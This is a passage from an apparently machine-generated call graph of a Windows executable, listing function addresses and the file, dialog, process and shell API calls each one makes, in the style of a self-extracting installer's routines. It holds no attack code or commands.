23577->23580 23578->23580 23621 d66fa5 75 API calls 23578->23621 23579->23580 23582 d69e8c 23579->23582 23580->23542 23582->23580 23622 d66fa5 75 API calls 23582->23622 23585 d69677 23584->23585 23586 d69688 23584->23586 23585->23586 23587 d69683 23585->23587 23588 d6968a 23585->23588 23586->23406 23623 d69817 23587->23623 23628 d696d0 23588->23628 23593 d69bfc 23591->23593 23595 d69c03 23591->23595 23593->23542 23594 d69c9e 23594->23593 23655 d66f6b 75 API calls 23594->23655 23595->23593 23595->23594 23597 d69cc0 23595->23597 23643 d6984e 23595->23643 23597->23593 23598 d6984e 5 API calls 23597->23598 23598->23597 23599->23542 23600->23539 23601->23558 23602->23555 23603->23554 23604->23545 23605->23558 23606->23558 23607->23550 23609 d6b679 23608->23609 23617 d6b683 23609->23617 23618 d6b806 CharUpperW 23609->23618 23611 d6b692 23619 d6b832 CharUpperW 23611->23619 23613 d6b6a1 23614 d6b6a5 23613->23614 23615 d6b71c GetCurrentDirectoryW 23613->23615 23620 d6b806 CharUpperW 23614->23620 23615->23617 23617->23570 23618->23611 23619->23613 23620->23617 23621->23577 23622->23580 23624 d69824 23623->23624 23625 d69820 23623->23625 23624->23625 23634 d6a12d 23624->23634 23625->23586 23629 d696dc 23628->23629 23632 d696fa 23628->23632 23631 d696e8 CloseHandle 23629->23631 23629->23632 23630 d69719 23630->23586 23631->23632 23632->23630 23642 d66e3e 74 API calls 23632->23642 23635 d7e360 23634->23635 23636 d6a13a DeleteFileW 23635->23636 23637 d6984c 23636->23637 23638 d6a14d 23636->23638 23637->23586 23639 d6b66c 2 API calls 23638->23639 23640 d6a161 23639->23640 23640->23637 23641 d6a165 DeleteFileW 23640->23641 23641->23637 23642->23630 23644 d69867 ReadFile 23643->23644 23645 d6985c GetStdHandle 23643->23645 23646 d69880 23644->23646 23647 d698a0 23644->23647 23645->23644 23656 d69989 23646->23656 23647->23595 23649 d69887 23650 d69895 23649->23650 23651 d698b7 23649->23651 23652 d698a8 GetLastError 23649->23652 23653 d6984e GetFileType 23650->23653 23651->23647 23654 d698c7 GetLastError 23651->23654 23652->23647 23652->23651 23653->23647 23654->23647 23654->23650 23655->23593 23657 d69992 GetFileType 23656->23657 23658 d6998f 23656->23658 23659 d699a0 23657->23659 23658->23649 23659->23649 23663 d7e24f new 23660->23663 23661 d78854 23661->23028 23663->23661 23666 d871ad 7 API calls 2 library calls 23663->23666 23667 d7ecce RaiseException CallUnexpected new 23663->23667 23668 d7ecb1 RaiseException Concurrency::cancel_current_task CallUnexpected 23663->23668 23666->23663 23670 d87430 CallUnexpected 23669->23670 23671 d87448 23670->23671 23673 d8757e _abort GetModuleHandleW 23670->23673 23691 d8a3f1 EnterCriticalSection 23671->23691 23675 d8743c 23673->23675 23674 d87450 23679 d874c5 23674->23679 23689 d874ee 23674->23689 23711 d87f30 20 API calls _abort 23674->23711 23675->23671 23703 d875c2 GetModuleHandleExW 23675->23703 23680 d874dd 23679->23680 23684 d881f1 _abort 5 API calls 23679->23684 23685 d881f1 _abort 5 API calls 23680->23685 23681 d8750b 23695 d8753d 23681->23695 23682 d87537 23712 d91a19 5 API calls CatchGuardHandler 23682->23712 23684->23680 23685->23689 23692 d8752e 23689->23692 23691->23674 23713 d8a441 LeaveCriticalSection 23692->23713 23694 d87507 23694->23681 23694->23682 23714 d8a836 23695->23714 23698 d8756b 23700 d875c2 _abort 8 API calls 23698->23700 23699 d8754b GetPEB 23699->23698 23701 d8755b GetCurrentProcess TerminateProcess 23699->23701 23702 d87573 ExitProcess 23700->23702 23701->23698 23704 d875ec GetProcAddress 23703->23704 23705 d8760f 23703->23705 23708 d87601 23704->23708 23706 d8761e 23705->23706 23707 d87615 FreeLibrary 23705->23707 23709 d7ec4a CatchGuardHandler 5 API calls 23706->23709 23707->23706 23708->23705 23710 d87628 23709->23710 23710->23671 23711->23679 23713->23694 23715 d8a85b 23714->23715 23718 d8a851 23714->23718 23716 d8a458 CallUnexpected 5 API calls 23715->23716 23716->23718 23717 d7ec4a CatchGuardHandler 5 API calls 23719 d87547 23717->23719 23718->23717 23719->23698 23719->23699 24856 d7acd0 100 API calls 24906 d719d0 26 API calls std::bad_exception::bad_exception 24857 d7a8c2 GetDlgItem EnableWindow ShowWindow SendMessageW 24858 d7eac0 27 API calls pre_c_initialization 24911 d797c0 10 API calls 24860 d89ec0 21 API calls 24912 d8b5c0 GetCommandLineA GetCommandLineW 24913 d8ebc1 21 API calls __vsnwprintf_l 24915 d7ebf7 20 API calls 23829 d7e1f9 23830 d7e203 23829->23830 23831 d7df59 ___delayLoadHelper2@8 19 API calls 23830->23831 23832 d7e210 23831->23832 23835 d7aee0 23836 d7aeea __EH_prolog 23835->23836 23998 d6130b 23836->23998 23839 d7af2c 23843 d7afa2 23839->23843 23844 d7af39 23839->23844 23900 d7af18 23839->23900 23840 d7b5cb 24063 d7cd2e 23840->24063 23847 d7b041 GetDlgItemTextW 23843->23847 23853 d7afbc 23843->23853 23848 d7af75 23844->23848 23849 d7af3e 23844->23849 23845 d7b5f7 23851 d7b611 GetDlgItem SendMessageW 23845->23851 23852 d7b600 SendDlgItemMessageW 23845->23852 23846 d7b5e9 SendMessageW 23846->23845 23847->23848 23850 d7b077 23847->23850 23855 d7af96 KiUserCallbackDispatcher 23848->23855 23848->23900 23854 d6ddd1 53 API calls 23849->23854 23849->23900 23856 d7b08f GetDlgItem 23850->23856 23996 d7b080 23850->23996 24081 d79da4 GetCurrentDirectoryW 23851->24081 23852->23851 23858 d6ddd1 53 API calls 23853->23858 23859 d7af58 23854->23859 23855->23900 23861 d7b0c5 SetFocus 23856->23861 23862 d7b0a4 SendMessageW SendMessageW 23856->23862 23863 d7afde SetDlgItemTextW 23858->23863 24103 d61241 SHGetMalloc 23859->24103 23860 d7b641 GetDlgItem 23866 d7b664 SetWindowTextW 23860->23866 23867 d7b65e 23860->23867 23868 d7b0d5 23861->23868 23881 d7b0ed 23861->23881 23862->23861 23864 d7afec 23863->23864 23875 d7aff9 GetMessageW 23864->23875 23864->23900 24082 d7a2c7 GetClassNameW 23866->24082 23867->23866 23869 d6ddd1 53 API calls 23868->23869 23874 d7b0df 23869->23874 23870 d7af5f 23876 d7af63 SetDlgItemTextW 23870->23876 23870->23900 23871 d7b56b 23877 d6ddd1 53 API calls 23871->23877 24104 d7cb5a 23874->24104 23880 d7b010 IsDialogMessageW 23875->23880 23875->23900 23876->23900 23882 d7b57b SetDlgItemTextW 23877->23882 23880->23864 23884 d7b01f TranslateMessage DispatchMessageW 23880->23884 23886 d6ddd1 53 API calls 23881->23886 23885 d7b58f 23882->23885 23884->23864 23889 d6ddd1 53 API calls 23885->23889 23888 d7b124 23886->23888 23887 d7b6af 23893 d7b6df 23887->23893 23898 d6ddd1 53 API calls 23887->23898 23894 d6400a _swprintf 51 API calls 23888->23894 23895 d7b5b8 23889->23895 23890 d7b0e6 24008 d6a04f 23890->24008 23892 d7bdf5 98 API calls 23892->23887 23906 d7bdf5 98 API calls 23893->23906 23926 d7b797 23893->23926 23899 d7b136 23894->23899 23896 d6ddd1 53 API calls 23895->23896 23896->23900 23904 d7b6c2 SetDlgItemTextW 23898->23904 23905 d7cb5a 16 API calls 23899->23905 23901 d7b847 23908 d7b850 EnableWindow 23901->23908 23909 d7b859 23901->23909 23902 d7b174 GetLastError 23903 d7b17f 23902->23903 24014 d7a322 SetCurrentDirectoryW 23903->24014 23911 d6ddd1 53 API calls 23904->23911 23905->23890 23907 d7b6fa 23906->23907 23915 d7b70c 23907->23915 23936 d7b731 23907->23936 23908->23909 23912 d7b876 23909->23912 24122 d612c8 GetDlgItem EnableWindow 23909->24122 23914 d7b6d6 SetDlgItemTextW 23911->23914 23920 d7b89d 23912->23920 23928 d7b895 SendMessageW 23912->23928 23913 d7b195 23918 d7b1ac 23913->23918 23919 d7b19e GetLastError 23913->23919 23914->23893 24120 d79635 32 API calls 23915->24120 23916 d7b78a 23921 d7bdf5 98 API calls 23916->23921 23931 d7b237 23918->23931 23933 d7b1c4 GetTickCount 23918->23933 23974 d7b227 23918->23974 23919->23918 23920->23900 23924 d6ddd1 53 API calls 23920->23924 23921->23926 23923 d7b86c 24123 d612c8 GetDlgItem EnableWindow 23923->24123 23930 d7b8b6 SetDlgItemTextW 23924->23930 23925 d7b725 23925->23936 23926->23901 23929 d7b825 23926->23929 23941 d6ddd1 53 API calls 23926->23941 23928->23920 24121 d79635 32 API calls 23929->24121 23930->23900 23938 d7b24f GetModuleFileNameW 23931->23938 23939 d7b407 23931->23939 23932 d7b46c 24023 d612e6 GetDlgItem ShowWindow 23932->24023 23934 d6400a _swprintf 51 API calls 23933->23934 23946 d7b1dd 23934->23946 23936->23916 23942 d7bdf5 98 API calls 23936->23942 24114 d6eb3a 80 API calls 23938->24114 23939->23848 23947 d6ddd1 53 API calls 23939->23947 23940 d7b844 23940->23901 23941->23926 23948 d7b75f 23942->23948 23943 d7b47c 24024 d612e6 GetDlgItem ShowWindow 23943->24024 23945 d7b275 23951 d6400a _swprintf 51 API calls 23945->23951 24015 d6971e 23946->24015 23952 d7b41b 23947->23952 23948->23916 23953 d7b768 DialogBoxParamW 23948->23953 23950 d7b486 23954 d6ddd1 53 API calls 23950->23954 23955 d7b297 CreateFileMappingW 23951->23955 23957 d6400a _swprintf 51 API calls 23952->23957 23953->23848 23953->23916 23958 d7b490 SetDlgItemTextW 23954->23958 23959 d7b2f9 GetCommandLineW 23955->23959 23992 d7b376 __vswprintf_c_l 23955->23992 23961 d7b439 23957->23961 24025 d612e6 GetDlgItem ShowWindow 23958->24025 23964 d7b30a 23959->23964 23960 d7b203 23965 d7b20a GetLastError 23960->23965 23966 d7b215 23960->23966 23973 d6ddd1 53 API calls 23961->23973 23962 d7b381 ShellExecuteExW 23987 d7b39e 23962->23987 24115 d7ab2e SHGetMalloc 23964->24115 23965->23966 23969 d69653 79 API calls 23966->23969 23967 d7b4a2 SetDlgItemTextW GetDlgItem 23970 d7b4d7 23967->23970 23971 d7b4bf GetWindowLongW SetWindowLongW 23967->23971 23969->23974 24026 d7bdf5 23970->24026 23971->23970 23972 d7b326 24116 d7ab2e SHGetMalloc 23972->24116 23973->23848 23974->23931 23974->23932 23978 d7b332 24117 d7ab2e SHGetMalloc 23978->24117 23979 d7b3e1 23979->23939 23986 d7b3f7 UnmapViewOfFile CloseHandle 23979->23986 23980 d7bdf5 98 API calls 23982 d7b4f3 23980->23982 24051 d7d0f5 23982->24051 23983 d7b33e 24118 d6ecad 80 API calls ___scrt_get_show_window_mode 23983->24118 23986->23939 23987->23979 23990 d7b3cd Sleep 23987->23990 23989 d7b355 MapViewOfFile 23989->23992 23990->23979 23990->23987 23991 d7bdf5 98 API calls 23995 d7b519 23991->23995 23992->23962 23993 d7b542 24119 d612c8 GetDlgItem EnableWindow 23993->24119 23995->23993 23997 d7bdf5 98 API calls 23995->23997 23996->23848 23996->23871 23997->23993 23999 d61314 23998->23999 24000 d6136d 23998->24000 24002 d6137a 23999->24002 24124 d6da98 62 API calls 2 library calls 23999->24124 24125 d6da71 GetWindowLongW SetWindowLongW 24000->24125 24002->23839 24002->23840 24002->23900 24004 d61336 24004->24002 24005 d61349 GetDlgItem 24004->24005 24005->24002 24006 d61359 24005->24006 24006->24002 24007 d6135f SetWindowTextW 24006->24007 24007->24002 24011 d6a059 24008->24011 24009 d6a0ea 24010 d6a207 9 API calls 24009->24010 24012 d6a113 24009->24012 24010->24012 24011->24009 24011->24012 24126 d6a207 24011->24126 24012->23902 24012->23903 24014->23913 24016 d69728 24015->24016 24017 d69792 CreateFileW 24016->24017 24018 d69786 24016->24018 24017->24018 24019 d697e4 24018->24019 24020 d6b66c 2 API calls 24018->24020 24019->23960 24021 d697cb 24020->24021 24021->24019 24022 d697cf CreateFileW 24021->24022 24022->24019 24023->23943 24024->23950 24025->23967 24027 d7bdff __EH_prolog 24026->24027 24028 d7b4e5 24027->24028 24158 d7aa36 24027->24158 24028->23980 24031 d7aa36 ExpandEnvironmentStringsW 24040 d7be36 _wcsrchr 24031->24040 24032 d7c11d SetWindowTextW 24032->24040 24037 d7bf0b SetFileAttributesW 24039 d7bfc5 GetFileAttributesW 24037->24039 24050 d7bf25 ___scrt_get_show_window_mode 24037->24050 24039->24040 24042 d7bfd7 DeleteFileW 24039->24042 24040->24028 24040->24031 24040->24032 24040->24037 24043 d7c2e7 GetDlgItem SetWindowTextW SendMessageW 24040->24043 24046 d7c327 SendMessageW 24040->24046 24162 d717ac CompareStringW 24040->24162 24163 d79da4 GetCurrentDirectoryW 24040->24163 24165 d6a52a 7 API calls 24040->24165 24166 d6a4b3 FindClose 24040->24166 24167 d7ab9a 76 API calls new 24040->24167 24168 d835de 24040->24168 24042->24040 24044 d7bfe8 24042->24044 24043->24040 24045 d6400a _swprintf 51 API calls 24044->24045 24047 d7c008 GetFileAttributesW 24045->24047 24046->24040 24047->24044 24048 d7c01d MoveFileW 24047->24048 24048->24040 24049 d7c035 MoveFileExW 24048->24049 24049->24040 24050->24039 24050->24040 24164 d6b4f7 52 API calls 2 library calls 24050->24164 24052 d7d0ff __EH_prolog 24051->24052 24183 d6fead 24052->24183 24054 d7d130 24187 d65c59 24054->24187 24056 d7d14e 24191 d67c68 24056->24191 24060 d7d1a1 24208 d67cfb 24060->24208 24062 d7b504 24062->23991 24064 d7cd38 24063->24064 24065 d79d1a 4 API calls 24064->24065 24066 d7cd3d 24065->24066 24067 d7cd45 GetWindow 24066->24067 24068 d7b5d1 24066->24068 24067->24068 24071 d7cd65 24067->24071 24068->23845 24068->23846 24069 d7cd72 GetClassNameW 24642 d717ac CompareStringW 24069->24642 24071->24068 24071->24069 24072 d7cd96 GetWindowLongW 24071->24072 24073 d7cdfa GetWindow 24071->24073 24072->24073 24074 d7cda6 SendMessageW 24072->24074 24073->24068 24073->24071 24074->24073 24075 d7cdbc GetObjectW 24074->24075 24643 d79d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24075->24643 24078 d7cdd3 24644 d79d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24078->24644 24645 d79f5d 8 API calls ___scrt_get_show_window_mode 24078->24645 24080 d7cde4 SendMessageW DeleteObject 24080->24073 24081->23860 24083 d7a30d 24082->24083 24084 d7a2e8 24082->24084 24086 d7a312 SHAutoComplete 24083->24086 24087 d7a31b 24083->24087 24646 d717ac CompareStringW 24084->24646 24086->24087 24090 d7a7c3 24087->24090 24088 d7a2fb 24088->24083 24089 d7a2ff FindWindowExW 24088->24089 24089->24083 24091 d7a7cd __EH_prolog 24090->24091 24092 d61380 82 API calls 24091->24092 24093 d7a7ef 24092->24093 24647 d61f4f 24093->24647 24096 d7a809 24098 d61631 84 API calls 24096->24098 24097 d7a818 24099 d61951 126 API calls 24097->24099 24101 d7a814 24098->24101 24100 d7a83a __vswprintf_c_l new 24099->24100 24100->24101 24102 d61631 84 API calls 24100->24102 24101->23887 24101->23892 24102->24101 24103->23870 24105 d7ac74 5 API calls 24104->24105 24106 d7cb66 GetDlgItem 24105->24106 24107 d7cbbc SendMessageW SendMessageW 24106->24107 24108 d7cb88 24106->24108 24109 d7cc17 SendMessageW SendMessageW SendMessageW 24107->24109 24110 d7cbf8 24107->24110 24111 d7cb93 ShowWindow SendMessageW SendMessageW 24108->24111 24112 d7cc6d SendMessageW 24109->24112 24113 d7cc4a SendMessageW 24109->24113 24110->24109 24111->24107 24112->23890 24113->24112 24114->23945 24115->23972 24116->23978 24117->23983 24118->23989 24119->23996 24120->23925 24121->23940 24122->23923 24123->23912 24124->24004 24125->24002 24127 d6a214 24126->24127 24128 d6a238 24127->24128 24129 d6a22b CreateDirectoryW 24127->24129 24147 d6a180 24128->24147 24129->24128 24131 d6a26b 24129->24131 24135 d6a27a 24131->24135 24139 d6a444 24131->24139 24133 d6a27e GetLastError 24133->24135 24135->24011 24136 d6b66c 2 API calls 24137 d6a254 24136->24137 24137->24133 24138 d6a258 CreateDirectoryW 24137->24138 24138->24131 24138->24133 24140 d7e360 24139->24140 24141 d6a451 SetFileAttributesW 24140->24141 24142 d6a467 24141->24142 24143 d6a494 24141->24143 24144 d6b66c 2 API calls 24142->24144 24143->24135 24145 d6a47b 24144->24145 24145->24143 24146 d6a47f SetFileAttributesW 24145->24146 24146->24143 24150 d6a194 24147->24150 24151 d7e360 24150->24151 24152 d6a1a1 GetFileAttributesW 24151->24152 24153 d6a1b2 24152->24153 24154 d6a189 24152->24154 24155 d6b66c 2 API calls 24153->24155 24154->24133 24154->24136 24156 d6a1c6 24155->24156 24156->24154 24157 d6a1ca GetFileAttributesW 24156->24157 24157->24154 24159 d7aa40 24158->24159 24160 d7aaf3 ExpandEnvironmentStringsW 24159->24160 24161 d7ab16 24159->24161 24160->24161 24161->24040 24162->24040 24163->24040 24164->24050 24165->24040 24166->24040 24167->24040 24169 d88606 24168->24169 24170 d8861e 24169->24170 24171 d88613 24169->24171 24173 d88626 24170->24173 24180 d8862f CallUnexpected 24170->24180 24172 d88518 __vsnwprintf_l 21 API calls 24171->24172 24177 d8861b 24172->24177 24174 d884de _free 20 API calls 24173->24174 24174->24177 24175 d88659 HeapReAlloc 24175->24177 24175->24180 24176 d88634 24181 d8895a 20 API calls _abort 24176->24181 24177->24040 24180->24175 24180->24176 24182 d871ad 7 API calls 2 library calls 24180->24182 24181->24177 24182->24180 24184 d6feba 24183->24184 24212 d61789 24184->24212 24186 d6fed2 24186->24054 24188 d6fead 24187->24188 24189 d61789 76 API calls 24188->24189 24190 d6fed2 24189->24190 24190->24056 24192 d67c72 __EH_prolog 24191->24192 24229 d6c827 24192->24229 24194 d67c8d 24195 d7e24a new 8 API calls 24194->24195 24196 d67cb7 24195->24196 24235 d7440b 24196->24235 24199 d67ddf 24200 d67de9 24199->24200 24201 d67e53 24200->24201 24264 d6a4c6 24200->24264 24205 d67ec4 24201->24205 24207 d6a4c6 8 API calls 24201->24207 24242 d6837f 24201->24242 24203 d67f06 24203->24060 24205->24203 24270 d66dc1 74 API calls 24205->24270 24207->24201 24209 d67d09 24208->24209 24211 d67d10 24208->24211 24210 d71acf 84 API calls 24209->24210 24210->24211 24213 d6179f 24212->24213 24224 d617fa __vswprintf_c_l 24212->24224 24214 d617c8 24213->24214 24225 d66e91 74 API calls __vswprintf_c_l 24213->24225 24216 d61827 24214->24216 24221 d617e7 new 24214->24221 24218 d835de 22 API calls 24216->24218 24217 d617be 24226 d66efd 75 API calls 24217->24226 24220 d6182e 24218->24220 24220->24224 24228 d66efd 75 API calls 24220->24228 24221->24224 24227 d66efd 75 API calls 24221->24227 24224->24186 24225->24217 24226->24214 24227->24224 24228->24224 24230 d6c831 __EH_prolog 24229->24230 24231 d7e24a new 8 API calls 24230->24231 24232 d6c874 24231->24232 24233 d7e24a new 8 API calls 24232->24233 24234 d6c898 24233->24234 24234->24194 24236 d74415 __EH_prolog 24235->24236 24237 d7e24a new 8 API calls 24236->24237 24238 d74431 24237->24238 24239 d67ce6 24238->24239 24241 d706ba 78 API calls 24238->24241 24239->24199 24241->24239 24243 d68389 __EH_prolog 24242->24243 24271 d61380 24243->24271 24245 d683a4 24279 d69ef7 24245->24279 24251 d683d3 24399 d61631 24251->24399 24252 d6846e 24298 d68517 24252->24298 24256 d684ce 24302 d61f00 24256->24302 24258 d683cf 24258->24251 24258->24252 24262 d6a4c6 8 API calls 24258->24262 24403 d6bac4 CompareStringW 24258->24403 24260 d684d9 24260->24251 24306 d63aac 24260->24306 24316 d6857b 24260->24316 24262->24258 24265 d6a4db 24264->24265 24269 d6a4df 24265->24269 24630 d6a5f4 24265->24630 24267 d6a4ef 24268 d6a4f4 FindClose 24267->24268 24267->24269 24268->24269 24269->24200 24270->24203 24272 d61385 __EH_prolog 24271->24272 24273 d6c827 8 API calls 24272->24273 24274 d613bd 24273->24274 24275 d7e24a new 8 API calls 24274->24275 24278 d61416 ___scrt_get_show_window_mode 24274->24278 24276 d61403 24275->24276 24277 d6b07d 82 API calls 24276->24277 24276->24278 24277->24278 24278->24245 24280 d69f0e 24279->24280 24281 d683ba 24280->24281 24405 d66f5d 76 API calls 24280->24405 24281->24251 24283 d619a6 24281->24283 24284 d619b0 __EH_prolog 24283->24284 24295 d61a00 24284->24295 24296 d619e5 24284->24296 24406 d6709d 24284->24406 24286 d61b50 24409 d66dc1 74 API calls 24286->24409 24288 d63aac 97 API calls 24291 d61bb3 24288->24291 24289 d61b60 24289->24288 24289->24296 24290 d61bff 24290->24296 24297 d61c32 24290->24297 24410 d66dc1 74 API calls 24290->24410 24291->24290 24293 d63aac 97 API calls 24291->24293 24293->24291 24294 d63aac 97 API calls 24294->24297 24295->24286 24295->24289 24295->24296 24296->24258 24297->24294 24297->24296 24300 d68524 24298->24300 24428 d70c26 GetSystemTime SystemTimeToFileTime 24300->24428 24301 d68488 24301->24256 24404 d71359 72 API calls 24301->24404 24303 d61f05 __EH_prolog 24302->24303 24304 d61f39 24303->24304 24430 d61951 24303->24430 24304->24260 24307 d63abc 24306->24307 24308 d63ab8 24306->24308 24309 d63af7 24307->24309 24310 d63ae9 24307->24310 24308->24260 24565 d627e8 97 API calls 3 library calls 24309->24565 24311 d63b29 24310->24311 24564 d63281 85 API calls 3 library calls 24310->24564 24311->24260 24314 d63af5 24314->24311 24566 d6204e 74 API calls 24314->24566 24317 d68585 __EH_prolog 24316->24317 24318 d685be 24317->24318 24331 d685c2 24317->24331 24588 d784bd 99 API calls 24317->24588 24319 d685e7 24318->24319 24325 d6867a 24318->24325 24318->24331 24320 d68609 24319->24320 24319->24331 24589 d67b66 151 API calls 24319->24589 24320->24331 24590 d784bd 99 API calls 24320->24590 24325->24331 24567 d65e3a 24325->24567 24326 d68705 24326->24331 24573 d6826a 24326->24573 24329 d68875 24330 d6a4c6 8 API calls 24329->24330 24332 d688e0 24329->24332 24330->24332 24331->24260 24577 d67d6c 24332->24577 24334 d6c991 80 API calls 24337 d6893b _memcmp 24334->24337 24335 d68a70 24336 d68b43 24335->24336 24343 d68abf 24335->24343 24341 d68b9e 24336->24341 24351 d68b4e 24336->24351 24337->24331 24337->24334 24337->24335 24338 d68a69 24337->24338 24591 d68236 82 API calls 24337->24591 24592 d61f94 74 API calls 24337->24592 24593 d61f94 74 API calls 24338->24593 24350 d68b30 24341->24350 24596 d680ea 96 API calls 24341->24596 24342 d68b9c 24344 d69653 79 API calls 24342->24344 24345 d6a180 4 API calls 24343->24345 24343->24350 24344->24331 24348 d68af7 24345->24348 24347 d69653 79 API calls 24347->24331 24348->24350 24594 d69377 96 API calls 24348->24594 24349 d68c09 24353 d69989 GetFileType 24349->24353 24362 d68c74 24349->24362 24390 d691c1 ___InternalCxxFrameHandler 24349->24390 24350->24342 24350->24349 24351->24342 24595 d67f26 100 API calls ___InternalCxxFrameHandler 24351->24595 24352 d6aa88 8 API calls 24356 d68cc3 24352->24356 24354 d68c4c 24353->24354 24354->24362 24597 d61f94 74 API calls 24354->24597 24358 d6aa88 8 API calls 24356->24358 24377 d68cd9 24358->24377 24360 d68c62 24598 d67061 75 API calls 24360->24598 24362->24352 24363 d68d9c 24364 d68df7 24363->24364 24365 d68efd 24363->24365 24366 d68e69 24364->24366 24367 d68e07 24364->24367 24369 d68f23 24365->24369 24370 d68f0f 24365->24370 24384 d68e27 24365->24384 24368 d6826a CharUpperW 24366->24368 24373 d68e4d 24367->24373 24380 d68e15 24367->24380 24374 d68e84 24368->24374 24372 d72c42 75 API calls 24369->24372 24371 d692e6 121 API calls 24370->24371 24371->24384 24376 d68f3c 24372->24376 24373->24384 24601 d67907 108 API calls 24373->24601 24382 d68eb4 24374->24382 24383 d68ead 24374->24383 24374->24384 24604 d728f1 121 API calls 24376->24604 24377->24363 24599 d69b21 SetFilePointer GetLastError SetEndOfFile 24377->24599 24600 d61f94 74 API calls 24380->24600 24603 d69224 94 API calls __EH_prolog 24382->24603 24602 d67698 84 API calls ___InternalCxxFrameHandler 24383->24602 24389 d6904b 24384->24389 24605 d61f94 74 API calls 24384->24605 24388 d69156 24388->24390 24392 d6a444 4 API calls 24388->24392 24389->24388 24389->24390 24391 d69104 24389->24391 24606 d69ebf SetEndOfFile 24389->24606 24390->24347 24583 d69d62 24391->24583 24393 d691b1 24392->24393 24393->24390 24607 d61f94 74 API calls 24393->24607 24396 d6914b 24398 d696d0 75 API calls 24396->24398 24398->24388 24400 d61643 24399->24400 24622 d6c8ca 24400->24622 24403->24258 24404->24256 24405->24281 24411 d616d2 24406->24411 24408 d670b9 24408->24295 24409->24296 24410->24297 24412 d61740 __vswprintf_c_l 24411->24412 24413 d616e8 24411->24413 24412->24408 24414 d61711 24413->24414 24424 d66e91 74 API calls __vswprintf_c_l 24413->24424 24416 d61767 24414->24416 24421 d6172d new 24414->24421 24418 d835de 22 API calls 24416->24418 24417 d61707 24425 d66efd 75 API calls 24417->24425 24420 d6176e 24418->24420 24420->24412 24427 d66efd 75 API calls 24420->24427 24421->24412 24426 d66efd 75 API calls 24421->24426 24424->24417 24425->24414 24426->24412 24427->24412 24429 d70c56 __vsnwprintf_l 24428->24429 24429->24301 24431 d61961 24430->24431 24433 d6195d 24430->24433 24434 d61896 24431->24434 24433->24304 24435 d618a8 24434->24435 24436 d618e5 24434->24436 24437 d63aac 97 API calls 24435->24437 24442 d63f18 24436->24442 24440 d618c8 24437->24440 24440->24433 24444 d63f21 24442->24444 24443 d63aac 97 API calls 24443->24444 24444->24443 24446 d61906 24444->24446 24459 d7067c 24444->24459 24446->24440 24447 d61e00 24446->24447 24448 d61e0a __EH_prolog 24447->24448 24467 d63b3d 24448->24467 24450 d61e34 24451 d616d2 76 API calls 24450->24451 24452 d61ebb 24450->24452 24453 d61e4b 24451->24453 24452->24440 24495 d61849 76 API calls 24453->24495 24455 d61e63 24457 d61e6f 24455->24457 24496 d7137a MultiByteToWideChar 24455->24496 24497 d61849 76 API calls 24457->24497 24460 d70683 24459->24460 24461 d7069e 24460->24461 24465 d66e8c RaiseException CallUnexpected 24460->24465 24463 d706af SetThreadExecutionState 24461->24463 24466 d66e8c RaiseException CallUnexpected 24461->24466 24463->24444 24465->24461 24466->24463 24468 d63b47 __EH_prolog 24467->24468 24469 d63b5d 24468->24469 24470 d63b79 24468->24470 24526 d66dc1 74 API calls 24469->24526 24472 d63dc2 24470->24472 24475 d63ba5 24470->24475 24543 d66dc1 74 API calls 24472->24543 24473 d63b68 24473->24450 24475->24473 24498 d72c42 24475->24498 24477 d63c26 24478 d63cb1 24477->24478 24494 d63c1d 24477->24494 24529 d6c991 24477->24529 24511 d6aa88 24478->24511 24479 d63c22 24479->24477 24528 d62034 76 API calls 24479->24528 24481 d63bf4 24481->24477 24481->24479 24482 d63c12 24481->24482 24527 d66dc1 74 API calls 24482->24527 24484 d63cc4 24488 d63d3e 24484->24488 24489 d63d48 24484->24489 24515 d692e6 24488->24515 24535 d728f1 121 API calls 24489->24535 24492 d63d46 24492->24494 24536 d61f94 74 API calls 24492->24536 24537 d71acf 24494->24537 24495->24455 24496->24457 24497->24452 24499 d72c51 24498->24499 24500 d72c5b 24498->24500 24544 d66efd 75 API calls 24499->24544 24502 d72ca2 new 24500->24502 24505 d72c9d Concurrency::cancel_current_task 24500->24505 24510 d72cfd ___scrt_get_show_window_mode 24500->24510 24503 d72da9 Concurrency::cancel_current_task 24502->24503 24504 d72cd9 24502->24504 24502->24510 24547 d8157a RaiseException 24503->24547 24545 d72b7b 75 API calls 4 library calls 24504->24545 24546 d8157a RaiseException 24505->24546 24509 d72dc1 24510->24481 24510->24510 24512 d6aa95 24511->24512 24514 d6aa9f 24511->24514 24513 d7e24a new 8 API calls 24512->24513 24513->24514 24514->24484 24516 d692f0 __EH_prolog 24515->24516 24548 d67dc6 24516->24548 24519 d6709d 76 API calls 24520 d69302 24519->24520 24551 d6ca6c 24520->24551 24522 d6935c 24522->24492 24524 d6ca6c 114 API calls 24525 d69314 24524->24525 24525->24522 24525->24524 24560 d6cc51 97 API calls __vswprintf_c_l 24525->24560 24526->24473 24527->24494 24528->24477 24530 d6c9c4 24529->24530 24531 d6c9b2 24529->24531 24562 d66249 80 API calls 24530->24562 24561 d66249 80 API calls 24531->24561 24534 d6c9bc 24534->24478 24535->24492 24536->24494 24538 d71ad9 24537->24538 24539 d71af2 24538->24539 24542 d71b06 24538->24542 24563 d7075b 84 API calls 24539->24563 24541 d71af9 24541->24542 24543->24473 24544->24500 24545->24510 24546->24503 24547->24509 24549 d6acf5 GetVersionExW 24548->24549 24550 d67dcb 24549->24550 24550->24519 24555 d6ca82 __vswprintf_c_l 24551->24555 24552 d6cbf7 24553 d6cc1f 24552->24553 24554 d6ca0b 6 API calls 24552->24554 24556 d7067c SetThreadExecutionState RaiseException 24553->24556 24554->24553 24555->24552 24557 d6cbee 24555->24557 24558 d784bd 99 API calls 24555->24558 24559 d6ab70 89 API calls 24555->24559 24556->24557 24557->24525 24558->24555 24559->24555 24560->24525 24561->24534 24562->24534 24563->24541 24564->24314 24565->24314 24566->24311 24568 d65e4a 24567->24568 24608 d65d67 24568->24608 24571 d65e7d 24572 d65eb5 24571->24572 24613 d6ad65 CharUpperW CompareStringW 24571->24613 24572->24326 24574 d68289 24573->24574 24619 d7179d CharUpperW 24574->24619 24576 d68333 24576->24329 24578 d67d7b 24577->24578 24579 d67dbb 24578->24579 24620 d67043 74 API calls 24578->24620 24579->24337 24581 d67db3 24621 d66dc1 74 API calls 24581->24621 24584 d69d73 24583->24584 24586 d69d82 24583->24586 24585 d69d79 FlushFileBuffers 24584->24585 24584->24586 24585->24586 24587 d69dfb SetFileTime 24586->24587 24587->24396 24588->24318 24589->24320 24590->24331 24591->24337 24592->24337 24593->24335 24594->24350 24595->24342 24596->24350 24597->24360 24598->24362 24599->24363 24600->24384 